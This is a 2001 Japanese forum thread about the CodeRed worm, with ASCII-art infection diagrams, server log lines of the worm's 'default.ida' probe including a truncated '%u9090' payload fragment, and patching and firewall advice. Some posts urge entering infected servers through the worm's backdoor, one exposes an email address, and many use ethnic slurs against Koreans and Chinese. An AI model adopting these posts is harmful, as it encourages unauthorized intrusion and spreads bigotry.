24 時間で再起動しちゃうんじゃないの?

もしかしてダイアルアップ?

666 :簡易修正:2001/08/08(水) 15:14
┌─────┐
│ ウィソNT   │          ルーター
│  IIS   ┏┷┓  EtherNet ┏━┓Internet
│(´д`)  ┃80┠──────┨80┠─────(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓   ┗┯┛          ┗━┛
│  ISAPI   │
│  ↓    │
│IndexServe │
└─────┘

┌─────┐
│ ウィソNT   │        ルーター
│  IIS   ┏┷┓ EtherNet ┏━┓Internet
│(´д`)  ┃80┠(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓  ┗┯┛        ┗━┛
│  ISAPI  │
│  ↓    │
│IndexServe │
└─────┘

┌────────┐
│ ウィソNT        │        ルーター
│  IIS        ┏┷┓ EtherNet  ┏━┓Internet
│(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜───┨80┠─────
│  ↓       ┗┯┛        ┗━┛
│  ISAPI       │
│BufferOverFlow!   │
│            │
└────────┘

┌────────┐
│ ウィソNT        │        ルーター
│  IIS       ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ
│  ↓       ┗┯┛       ┗━┛
│  ISAPI       │
│BufferOverFlow!   │
│            │
└────────┘

667 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:14
再起動したとたんまた感染

668 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:14
まだちょっとずれてるなぁ。

669 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:15
このネタも結構続くなあ、既に600越しているんですか、、
まるで、CodeRed の LOG みたいだ、、

670 :ウィソNT:2001/08/08(水) 15:16
/default.ida?XX.......

671 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:16
自分は感染しないから面白くない。

672 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:19
┌─────┐
│ ウィソNT  │       ルーター
│  IIS ┏┷┓ EtherNet ┏━┓Internet
│(´д`)┃80┠──────┨80┠─────(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓ ┗┯┛      ┗━┛
│  ISAPI │
│  ↓  │
│IndexServe│
└─────┘

┌─────┐
│ ウィソNT  │       ルーター
│  IIS ┏┷┓ EtherNet ┏━┓Internet
│(´д`)┃80┠(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓ ┗┯┛      ┗━┛
│  ISAPI │
│  ↓  │
│IndexServe│
└─────┘

┌────────┐
│ ウィソNT       │       ルーター
│  IIS    ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓    ┗┯┛      ┗━┛
│  ISAPI    │
│BufferOverFlow! │
│        │
└────────┘

┌────────┐
│ ウィソNT     │       ルーター
│  IIS    ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ
│  ↓    ┗┯┛      ┗━┛
│  ISAPI    │
│BufferOverFlow! │
│        │
└────────┘

673 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:20
図見た限りじゃ、ルーターは無意味ですか?

674 :672:2001/08/08(水) 15:21
AsciiArtEditorでは大丈夫なのに・・・

675 :ウィソNT:2001/08/08(水) 15:22
 

676 :672:2001/08/08(水) 15:22
┌─────┐
│ ウィソNT ..  .│       ルーター
│  IIS   .┏┷┓EtherNet.┏━┓Internet
│(´д`)  ┃80┠────┨80┠─────(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓ . . ..┗┯┛     . ┗━┛
│  ISAPI  . .│
│  ↓  .  . │
│IndexServer│
└─────┘

┌─────┐
│ ウィソNT   .│       ルーター
│  IIS .  ┏┷┓ EtherNet ┏━┓Internet
│(´д`)  ┃80┠(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓   ┗┯┛      .. ┗━┛
│  ISAPI  . .│
│  ↓     ..│
│IndexServer│
└─────┘

┌────────┐
│ ウィソNT       │       ルーター
│  IIS       ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓      ...┗┯┛   ..    ┗━┛
│  ISAPI      . │
│BufferOverFlow!  .│
│               │
└────────┘

┌────────┐
│ ウィソNT      .  │       ルーター
│  IIS       ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ
│  ↓    .   ┗┯┛   ..    ┗━┛
│   ISAPI.  .      │
│BufferOverFlow!.  │
│   .          │
└────────┘

677 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:25
お、完璧。
ルーターはこの場合、ポート80をサーバーに転送していると
言う事で。

678 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:27
内容の前にずれてるんですが。

679 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:28
>>673
ポート80に入ってくるのを止めれば、対策になる。
個人鯖を開いてなきゃ、止めてもかまわないでしょ?

680 :名無しさん:2001/08/08(水) 15:36
>>673
Lanの構成とルータの設定による。
うちのW2Kはクライアントとして使ってるけど
ポート80をインターネット側からは閉めてるので一度も
ぞぬの警告が来ませんが、Linux+apacheサーバーには
びしばし、アタックが来ています。

681 :680:2001/08/08(水) 15:37
すまぬ。
Webサーバーのみポート80は開けています。

682 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:42
80と8080ってどう違う?

683 :680:2001/08/08(水) 15:47
80はWeb用8080はproxy

684 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:49
変種ワーム「コードレッド2」が活発化、ハッカーの侵入口開放
http://news.yahoo.co.jp/headlines/bcn/010808/cpt/14300000_bcncpt010.html

遅っ

685 :名無しさん@お腹いっぱい。:2001/08/08(水) 15:54
>>683
thanx

686 :名無しさん@お腹いっぱい。:2001/08/08(水) 16:03
>>682
101倍違う

687 :名無しさん@お腹いっぱい。:2001/08/08(水) 16:08
>>686
遅レスの割につまらないね。

688 :名無しさん@お腹いっぱい。:2001/08/08(水) 16:09
>>686
確かに・・・ププp

689 :名無しさん@お腹いっぱい。:2001/08/08(水) 16:19
http://210.64.51.186

なぜにNT?
おまえらコバルト売る気ないんか?

690 :名無しさん@本当にお腹いっぱい。:2001/08/08(水) 16:27
同じところからは24時間or48時間以上離れてアタックにこないと
思ってんだけど、そうでもないのはなぜに?
FWの内側で増殖していて、こちらで見えるのは一緒ってだけ?

691 :名無しさん@お腹いっぱい。:2001/08/08(水) 16:30
    ,-‐――、 コードレッドデース♪
   /  ┃┃ ヽ-、
   し  '' ∇ '' |‐'
   ヽ___   _ノ、
    'ー-' ̄ `ー-'

692 :ウィソNT:2001/08/08(水) 16:31
c36.h061013015.is.net.tw - - [08/Aug/2001:16:11:30 +0900] "GET /default.ida?
c36.h061013015.is.net.tw - - [08/Aug/2001:16:11:35 +0900] "GET /default.ida?

693 :665:2001/08/08(水) 16:33
665 です

>>690

そうゆことだったのか。気づかなかったよ。そこの LAN すごい
ことになってるんだろうね。

694 :名無しさん@お腹いっぱい。:2001/08/08(水) 16:36
>>689
たしかに笑える。
っていうか、ドメイン無いヤンここ。

695 :690:2001/08/08(水) 16:38
>>693

がい出だったのねスマソ

696 :名無しさん@お腹いっぱい。:2001/08/08(水) 16:54
━━━━━CodeRedIIは笑えた!
default.ida1000アクセスごとにカウントしてたのってオレだけ?
(よっしゃー2000アクセス突破!よーし次は3000アクセス突破しろーって)
でも結局は6000アクセスしかきてねえんだよね。全然、騒ぐほどじゃないし。
CodeRedIIは笑えた。まじで
SlashdotJapanで知って、手を叩いてわらったなぁ。
おまえらがCodeRedIIにあってる間、2chでIP晒し上げてた
アホだなーこいつらって思いながら
わざわざnet sendで警告送ろうかと思ったよ。
でもCodeRedIIのおかげで何かしらの利益を得た人だっている訳だし
結果的には良かったんじゃないかな。
たしかJPCertやIPAがユーザーへのAdvisoryを渋っていたけどさ、
あそこらへんってADSL厨が多いからそのまま全滅させたかったんだよね。
今でもブロードバンドで繋いでるやつがいるらしいけど、
せこいんだよ!俺らの帯域なんだよね。むかつく。
ところでCodeRedII感染後はあいつらってインターネットどうしてたの?
もしかして気づかずに露画像ダウソ?厨房だなぁー。
どちらにしろSECURITY.NLのRed Code worm statsはまさに
原子爆弾のようで壮観だった!
気持ちの良い夕刻でした

697 :名無しさん@お腹いっぱい。:2001/08/08(水) 16:56
>>696
どっかで見た文面だな。>>233

698 :名無しさん@お腹いっぱい。:2001/08/08(水) 16:59
メールで感染を指摘したある会社の管理者の返事。

「ご指摘ありがとうございます。
 担当者に連絡しフォーマット後、再インストールしました。
 これで大丈夫だと思います」

をい。パッチは当ててないのか???
きっとこの返事を書いている間に再感染してるぞ・・・。

699 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:00
>>698
晒せ!晒せ!晒せ!

700 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:00
>>698
「ご指摘ありがとうございます。
 担当者に連絡しフォーマット後、再インストールしました。
 これで大丈夫だと思います」
            ~~~~~~~~~
アウト。

701 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:02
>>698
絶対パッチなんて当ててないよ、それ。
今ごろもう一回感染してるんで、バックドア開けてみ。

702 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:07
http://www.nifty.com/support/information/virus_text.htm
ニフティもやっと告知始めたけどこんな奥まったとこだけかい!

703 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:18
      ・ .
     ● ・ ぺた。

704 :123:2001/08/08(水) 17:20
>>702
更新日時見たら8/8 11:24になってるね。
昨日大量に@niftyにログ送った甲斐があった(チョトダケ)

705 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:23
ちなみにOCNでは、CodeRedに気づいたのは今週に入ってからだといってた。

706 :ウィソNT:2001/08/08(水) 17:24

・ .
● ・ ぺた。

707 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:28
Code Redに感染しないパッチのあるサイトを教えてください。

708 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:29


709 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:30
一番古いのはこれだな
titan.ttlc.net - - [19/Jul/2001:23:35:12 +0900]

この時期対応パッチでてたっけ?

710 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:31
               ・ .
               ● ・ ぺた。

711 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:38
         . ┏━━━━━━━━━━━━━━━━━━┓
 ┏━━━━━┫            ☆             .┃
 ┃       ,┗┳━━┳━━━━━━━━━━┳━━┳┛
 ┃ ._____ ,┃||●||┃┌────┬───┐┃    ┃
 ┃|┃┃┃┃|┃||新||┃│     ...│      │┃. ■, ┃
 ┃|┃┃┃┃│┃||宿||┃└────┴───┘┃. □, ┃
 ┃ . ̄ ̄ ̄ ̄ ̄ ,┃||署||┣━━━━━━━━━━┫    ┃
 ┃         ,┃    ┃              ..┃    ┃
 ┃         ,┃    ┃              ..┃    ┃
 ┃         ,┃    ┃              ..┃┏━┻━━━┓
 ┃         ,┃   <,=@=.フ      .     ┃┃本日の… . .┃
 ┃         ,┃   ( ・∀・)  .       ∬  ┃┃ 犯罪者  3┃
 ┃         ,┃   (,, ーY‐)   ,    ,旦_┃┃ 感染者  9┃
 ┃         ,┃    |.=◎=|.   ||_ └┬─┨┃ 夏厨  20 ┃
 ┃         ,┃   (__)_)    ]  ..│  ┃┗┳┳━━┳┛

712 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:40
1分間に20回も同じ所から来るのは普通?

713 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:45
>>709
パッチは6月に出てるし、ニュースサイトでも比較的大きくとりあげられている。
つまり、まともな管理者ならば CodeRed 出現の1ヶ月前にすでに対策は完了していたはず。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-033
http://www.zdnet.co.jp/news/0106/19/e_iisflaw.html
http://www.zdnet.co.jp/news/0106/25/e_iis.html

714 :709:2001/08/08(水) 17:48
>>713

NTの世界のことは良く知らないんだ。情報Thx。

ちなみにV2は8/4からだね。

715 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:49
>>705
Webサーバ運用してれば、アルバイトでも気づくだろーに。ふぅぅぅですね。

716 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:50
>>712
ウチは14秒の間に15回きたよ。

717 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:50
>>712
(1) proxy経由でしょう。
(2) nat経由でしょう。
(3) わざとでしょう。

718 :名無しさん@お腹いっぱい。:2001/08/08(水) 17:52
>>715
ログなんて見てないんでしょう。きっと...

719 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:05
しかし、MSのダウンロードのページは、英語
これで勝手にダウンロードしろとは、ちょっと素人さん相手にひどいんじゃないかな。>MS
大体パッチをダウンロードできても、IIS の止め方も知らないんじゃないかな。
Windows の息の根の止め方から懇切丁寧に説明してあげてね。>MS

各プロバイダも、少し配慮が足りない気がする。 今は、犯人を遮断しているかもしれないけど、
どうやって、パッチを当てさせようとするんだろう。

720 :名無し:2001/08/08(水) 18:07
昨日の21時から 634匹 Nが1匹のみ 後は全部X
8割が KRから

海底ケーブル切断 AA きぼんぬ

721 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:08
>>719
彼らの言い分は、「家庭用PCは関係ない」んだそうですんで(藁

722 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:09
>>720
昨日からDNS引ける奴とか、国内のやつはうんと減ったようだよね。
おなじくAAきぼんぬ

723 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:12
>>719
ホント ソウダネ・・・
とっとと日本語ページにしろやゴルァ・・・です。
ついでに浣酷語と厨獄語もね(藁

724 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:14
井ってよし
ttp://www.nefty.net/desktop/haritsuke/img-box/img20010808002632.gif

725 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:15
確かにjpドメイン減ってきた。
ドメイン不明な奴はほとんどカンコック・台湾なんだろうな・・。なんとかしろコルァ(´д`)

726 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:15
浣酷コリャー!!
いいかげんに気付けよな

727 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:20
どなたか「コードレッド逝ってヨシ」リング作りませんか?

728 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:22
MSKKが無料問合せ窓口開設
ttp://www.zdnet.co.jp/news/bursts/0108/08/ms.html

729 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:22
>>721
窓2kを売り出した頃は、
コンシューマにも売り込みたがっていたような記憶があるけれど、
気のせい?

730 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:24
イベントビューアでシステムログ見るとIIS Admin Serviceとかが不正終了してるんだけど
これって未だに感染してるって事でしょうか?パッチと駆除プログラムで対応したつもりなのに・・・

今は↑の方にあった対策法のページを再確認して手順通りやったけど、また再感染するのでは
と不安でしかたありません・・・ふぅ、ひよこ管理者には辛いッす

731 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:25
>>729
気のせいです(藁

732 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:25
中国からはCHINANET
韓国からはDACOM BORANETとKOREA TELECOM
台湾からはHINET
が多い。今日になって一回ロシアからNが来た。

733 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:29
>>730
もうこのさい、WinでもApacheに変えたほうがあとあと楽では?
#コンテンツが多くてそうもいかないとか・・・

734 :ひよこ管理者:2001/08/08(水) 18:33
ううっ、ColdFusion使ってるんで現状NT+IISの組み合わせから脱却できないす
ああっColdFusionも逝って良しなんて言わないで下さいね(涙

735 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:34
ASPをPHPに書き換える仕事が儲かりますか?(藁

736 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:34
>>733
「動作保障のないものなんか駄目!」とか、オエラ方が言い出すに1票。

737 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:35
>>733
AN HTTPDでゴメソ

738 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:36
>>734
お仕事お疲れさんです。
.idaなど、ColdFusionの使わない、いらんMS独自機能を切るくらいしかなさそうですね。
でわでわ

739 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:37
>>736
大手でもSolarisなんかはApache多いよ?

IBMとかも、適当に拡張して自分とこの製品にして売ってたような。

740 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:37
>> 733

IBM に保証してもらおう。お金をつんで。

741 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:37
>>736
どっちみち責任とってくれるのは誰かいな〜という会社の仕組みシリーズですね。

742 :ひよこ管理者:2001/08/08(水) 18:43
レスどうもです>>738
.idaとやらは手順に従い削除しました、今のところは不正終了は起こっていないようですが
もうすぐ退社時間なので明日の朝どうなってるかがドキドキす

#こんなの幾つもくぐってにわとり管理者位になって行くのでしょうか?道は険しい

743 :736:2001/08/08(水) 18:44
>>741
疲れるハナシです。
せっかく会社の為にヨカレと思ってハナシしてるのにね〜。

まして、ウチの会社はシステム屋ですぜ。(泣

744 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:46
>>742
お仕事ご苦労さん。
IISと付き合う限り、山あり谷ありでしょうね。
谷ばっかりになったりして・・

745 :まだ逝ってないが:2001/08/08(水) 18:46
ns.microsopt.com - - [08/Aug/2001:03:45:44 +0900] "GET /default.ida?XXXXXXX

746 :738:2001/08/08(水) 18:46
>>742
失礼、.idaを消しても、.idaに関連付けられたDLLを起動しちまうとまずいので、
拡張子とDLLのマッピング定義を削除する必要があるのでした。

747 :名無しさん@お腹いっぱい。 :2001/08/08(水) 18:48
mailserver.nyaes.go.kr

(ぷ

748 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:48
>>743
そうでなくても、技術用語がわからない上司の上司への説明文を書かされる。
・・・え〜っと、なんだかCodeRedと関係のない方向へ (藁

749 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:49
http://cj3154674-a.yahat1.ky.home.ne.jp/
見たいよぉ。

750 :ひよこ管理者:2001/08/08(水) 18:50
拡張子とDLLのマッピング・・・メモメモ
おっしゃる意味は解るんですがどこをどうすればいいか皆目見当もつかんので
調べに逝ってキマス。その間にうちのヘボ鯖が噛みついてもおこらんでください(汗

あと10分で業務終了だ!?間に合うのかな?こういう時”残業禁止”が恨めしいです、ハイ

751 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:51
>>748
いやいや、世のサーバー管理者が愚痴モードに入ってるのはCodeRedのせ
いなんだから無関係とは言えないですよ(藁

752 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:51
>>750
用語はテキトーなので、用語まちがってたら文意を汲んでくれい。

753 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:54
ほんっと〜〜〜〜っに韓国(筆頭客人)を切り離してほしくなってきたぞぅゴルァ
生IPばっかでうざすぎる

754 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:55
よそでやってくれや

755 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:56
>>752
スマソ。追加情報。
プロパティ−仮想ディレクトリ(タブ)−アプリケーションの設定(フレーム)
−構成ボタン(ボタン)−アプリケーションのマッピング
ホームディレクトリと、それぞれの仮想ディレクトリごと。

756 :名無しさん@お腹いっぱい。:2001/08/08(水) 18:58
地図は更新されてないけど、グラフは日曜の量を超えましたね。
定常状態になってしまったかも・・・
http://www.security.nl/misc/codered-stats/

757 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:00
なんだこれ? GET /default.ida? がない

61-218-137-90.hinet-ip.hinet.net - - [08/Aug/2001:18:28:45 +0900] "XX (略) XX%u9090%u6858 (略) %u0078%u0000%u00=a HTTP/1.0" 400 -

758 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:02
>>757
既出のよ〜です。種無しバージョンと勝手に命名。

759 :斥候:2001/08/08(水) 19:02
隊長!
Code Red を臆面も無く商業的に利用するHPをハッケソしました!

http://member.nifty.ne.jp/i-tech/codered/menu.htm
http://www2.to/codered/

760 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:03
>>759
ほかにもミュージシャンのサイトがあったぞ。忘れたけど。

761 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:05
>>760
http://www3.airnet.ne.jp/codered/

762 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:06
>>760
http://www3.airnet.ne.jp/codered/

763 :757:2001/08/08(水) 19:08
>>758
どうもです。

764 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:09
おまえら三流プログラマーに何が出来るんじゃ!!

ウィルス&メルボム上等!

来週PC買い換えるから折れを潰してみろよ!

どうせおまえらなんか何も出来ないと思うけど。

折れにはノートン君がついてるからまず無理だよね。

       mk913@ps.ksky.ne.jp

765 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:10
>>764
実は憎い相手のメアドだったという話

766 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:10
「株式会社いわもと」とかいうたけのこ会社からアタックが来た。

767 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:12
>>758

「種無し」だから子はできないのかな?

768 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:13
暇つぶしに感染してますねってディレクトリ勝手に作ってみた。はは(藁
winnt 削除するよりはいい人だろ?

769 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:18
http://www.dogonvillage.com/codered/
http://www.codered.org/
http://www.code-red.co.uk/

770 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:19
18:24 全国2百カ所で感染。新種のコンピューターウイルス
「コードレッド2」。警察庁が全国の警察に被害防止対策を指示。

771 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:24
>>770
200どころじゃないだろう(藁

772 :198:2001/08/08(水) 19:26
>>770
具体的に何できるのK察庁?

773 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:28
警察の管轄なのか...

774 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:29
警察官が来て立ち会いの元でWinの再インストールを...

775 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:30
>>774
で、パッチをあてそこなって元の木阿弥。
チャンチャン♪

776 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:31
>>774
令状とか持ってくるとしたらcode redにやられてみたいかも(w

777 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:31
777かな?

778 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:32
昨日今日と同じプロバイダーの別IPアドレスから
"GET /default.idaがあったんでそれぞれ通告し、
昨日は「対応しました」と返事があったんだけど、
今度はそのプロバイダー自身のサーバーから"GET /default.ida来たよ(鬱

779 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:34
警察官が来て立ち会いのもとでバックドアから(自粛

780 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:36
>>764
お〜いこの人の母は?父は?妹は?弟もいるのか?

781 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:37
>>767
そう。#すまん。飯召し上がっててレス遅れた。

782 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:39
だんだんマターリスレになってきましたね。
今夜もダイアルアップ厨の赤虫ヲチすること決定か(w

783 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:39
>>780
>>764へのファンレターは
 http://ton.2ch.net/test/read.cgi?bbs=sec&key=996326020&ls=50
 でsageでやってね。まあ、可哀相な子なんだからあんまりイヂメないように。

784 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:40
>>724
けっこういいかも。
萌えというほどではないが。

785 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:41
>>783
上げて鷹、スマソ

786 :767:2001/08/08(水) 19:42
>>781
ありがと

787 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:42
>>782
今晩は、実況中継はやだな。止めたのに・・・

788 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:45
DoS攻撃間違い無し(藁
http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/msn/137249

789 :762:2001/08/08(水) 19:46
http://www.nava21.co.jp/
名張二十一世紀ケーブルテレビジョン株式会社

この会社、サイト内で当社の鯖は感染してませんとか言っといて
俺のところにちゃんとアタックログのこってるっちゅうねん。

日付: 2001/08/08 時刻: 19:18:16
未使用ポートブロック機能が通信をブロックしました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 61.121.231.14,http

790 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:48
MSによる苦情^H^H駆除ガイド情報

http://www.microsoft.com/japan/technet/security/codeptch.asp

791 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:49
mesh.ad.jpってbiglobeで合ってるよね?
ここから爆撃が止まない

792 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:51
今朝方、他人のおいたバックドアから侵入してた人たちいるみたいだけど、犯罪だよ。
こんなとこで公言してると近いうちに御用だよ。ちょっと調子に乗りすぎちゃったね。

793 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:52
>>790
改行しろゴルァ>MS

794 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:53
>>792
うむ。深夜とそれ以外でガラっと雰囲気変わるもんな。このスレ(w

795 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:54
dionにおたくのユーザーが感染してますよって教えてあげたらCodeRedって何?って聞かれた(w

796 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:56
>>793
バッファーあふれを狙ったと思われ(藁

797 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:57
管理者とプロバイダにメール & 電話かけまくり作戦活動中の 1 です。
戦況は思わしくないです。
昨日、対策の約束をしたサイト、まだ放置プレイされたままの所多数。
鬱だ。どうしてくれよう。

798 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:57
>>795
いいなー、楽そうな会社だ。

799 :名無しさん@お腹いっぱい。:2001/08/08(水) 19:59
>>797
電話掛けるのばからしいんだけど、
メールだけじゃダメ?

800 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:01
>>795
うちのかーちゃんでも、知っているのに。
新聞の1面に載ったから。

うちのマシンにもバンバン来るよ、って言ったら
来るとこ見たいって。(藁

801 :797:2001/08/08(水) 20:01
>>799
エラーメールになったりする所は電話かけてます。
電話代モッタイナイ...

802 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:03
>>801

キミの努力がInternetを支えてるんだ。ガンバレ(><)

オレモメールオクリマクリダヨ(゚д゚)

803 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:04
>>792
>こんなとこで公言してると近いうちに御用だよ。

ばーか!!

804 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:05
うわぁ、厨房くせえ、ホンモノだね>>803

805 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:08
朝までには900いきそうだね。

806 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:08
>>803
夏ですね・・・

807 :ニダー:2001/08/08(水) 20:23
 / ̄ ̄ ̄ ̄ ̄ ̄ ̄
 | 今日も割れ物探しニダ〜〜♪
 \__ ____
    ∨    ___    カタカタニダ〜
   ∧_∧  ||\ L G\ ̄|  ̄|
   <丶`∀´> || | ̄ ̄||:|  
 ┌(  つ/ ̄||/  ̄ ̄/ |=|
 | ヽ |二二二」二二二二二二二二」
   ̄]|__7| |       | |
  / ̄\ /  |      / .|
  ◎  ◎[__」     [__」

808 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:23

                  /)
             、2)Y⌒  ⌒フ   +
           ッ-i'´       ⌒フ
           (´ ,.-゙ー-、     ろ、
        * シ彡ノ"ミVv    )
      *    ノノノノ"ヽヽヽミ   シ  / ̄ ̄ ̄ ̄ ̄
.          ,l')∩  ∩ |)|ヾ ミ  < コードレッド ってす・て・き!
           ,○)、 ▽  ノjl| YY゙    \_____
           {_∃ `l____/⌒'i|
            ̄ Yl"゙⌒lY |  +
              ,ト|__/ハ i、
           ,iニiニiニユ ゙h,,)
           ノtYTYヾ\
          /''フ''''ー<"ヽ、
           /__ノ     \ノヽ、
          (__)     ゞ__)

809 :ニダー:2001/08/08(水) 20:23
   \从/     ___    
   ∧_∧  ||\ L G\ ̄|  ̄|
 Σ <;`Д´> || | ̄ ̄||:|  
 ┌(  つ/ ̄||/  ̄ ̄/ |=|
 | ヽ |二二二」二二二二二二二二」
   ̄]|__7| |       | |
  / ̄\ /  |      / .|
  ◎  ◎[__」     [__」

810 :ニダー:2001/08/08(水) 20:24
   ..’ ’∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ,;;:: <;`Д.⊂ヽ< アイゴー一体どうなってるニダ〜〜〜 !!!!!!
   ,;::⊂     ノ  \______________________
       人  Y
      レ (_フ

811 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:24
どうやら、ここ感染してます。

812 :ニダー:2001/08/08(水) 20:25
  ∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧
< とりあえず脊髄反射で
< チョパーリに謝罪と補償を恫喝するニダ!!!
  ∨∨| ./∨∨∨∨∨∨∨| ./∨∨∨
     |/            |/
   888888        Λ_Λ
  <丶`∀´>      <丶 `∀´>  ファイティン!!!!!!!!
  (┌斤Y斤⊃     (  y  )
  / / .| | ヽ      ./ / /..
. └-レ─レ─ゝ   〈_フ__フ  

813 :名無しさん@お腹いっぱい。:2001/08/08(水) 20:26
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 反応速度が「電子レベルか?」ってやつ結構いますよね
\__   __________
     ∨
    ∧_∧           ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
